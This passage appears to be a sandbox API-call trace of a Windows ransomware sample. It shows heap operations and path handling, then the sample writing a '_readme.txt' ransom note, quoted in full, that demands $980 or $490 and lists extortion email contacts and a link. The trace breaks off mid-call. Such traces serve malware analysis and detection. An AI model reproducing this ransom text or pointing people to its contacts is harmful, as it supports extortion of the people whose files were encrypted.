hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.502] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.502] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.502] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.502] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.502] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.502] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.503] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.503] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.503] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.503] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.503] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.504] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.504] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.504] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.504] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.504] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.504] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.504] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.505] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.505] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.505] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.505] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.505] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.505] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.505] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.506] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.506] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0184.506] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.506] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.507] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.507] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.507] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.507] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.507] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.507] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.507] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.507] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0184.508] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.508] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.508] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.508] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.509] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0184.509] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.509] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.509] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.509] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0184.510] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.510] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.510] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.510] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.511] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.511] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.511] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.511] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.511] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.511] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.512] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.512] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.512] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0184.512] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.512] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.513] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.513] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.513] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0184.513] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.513] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.513] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.513] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0184.514] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.514] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.514] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.514] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.514] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.515] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.515] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.515] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.515] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.515] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.515] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.515] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.516] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.516] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.516] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.516] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.516] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.517] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.517] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.517] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.517] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.517] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.517] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.517] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.518] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.518] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.518] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.518] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.518] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.519] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.519] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.519] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.519] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0184.519] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.519] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.520] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.520] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.520] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.520] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.521] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.521] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.521] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0184.521] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.521] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.521] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.521] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0184.522] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.522] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.522] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.522] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.522] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.523] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.523] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.523] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.523] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.523] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.523] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.523] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.523] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0184.524] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.524] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.524] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.524] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.524] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0184.525] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.525] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.525] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.525] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0184.526] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.526] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.526] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.526] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.526] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.526] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.526] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.526] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.527] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.527] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.527] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.527] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.527] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.528] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.528] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.528] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.528] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.529] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.529] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.529] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.529] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.529] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.529] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.529] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.530] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.530] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.530] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.530] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.531] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.531] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.531] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.531] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.531] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0184.531] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.531] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.532] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.532] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.532] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.532] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.532] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.533] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.533] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0184.533] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.533] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.533] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.533] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0184.533] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.534] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.534] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.534] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.534] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.534] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.534] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.534] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.535] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.535] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.535] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.535] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.535] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0184.535] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.536] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.536] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.536] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.536] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0184.536] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.536] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.537] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.537] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.537] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.537] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.537] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.537] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.537] PathFindFileNameW (pszPath="C:\\Boot\\sv-SE\\") returned="sv-SE\\" [0184.537] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.537] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0184.537] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0184.538] PathFindFileNameW (pszPath="") returned="" [0184.538] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.538] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x74ff0000 [0184.538] GetProcAddress (hModule=0x74ff0000, lpProcName="SHGetFolderPathW") returned 0x75075708 [0184.538] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x800) returned 0x2e902a8 [0184.538] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2e902a8 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0184.538] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x2e765d0 [0184.539] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.539] FreeLibrary (hLibModule=0x74ff0000) returned 1 [0184.539] PathAppendW (in: pszPath="C:\\Boot\\sv-SE\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\sv-SE\\_readme.txt") returned 1 [0184.539] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.539] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.539] PathFileExistsW (pszPath="C:\\Boot\\sv-SE\\_readme.txt") returned 0 [0184.539] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x2e93a68 [0184.539] lstrcpyW (in: lpString1=0x2e93a68, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0184.539] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are 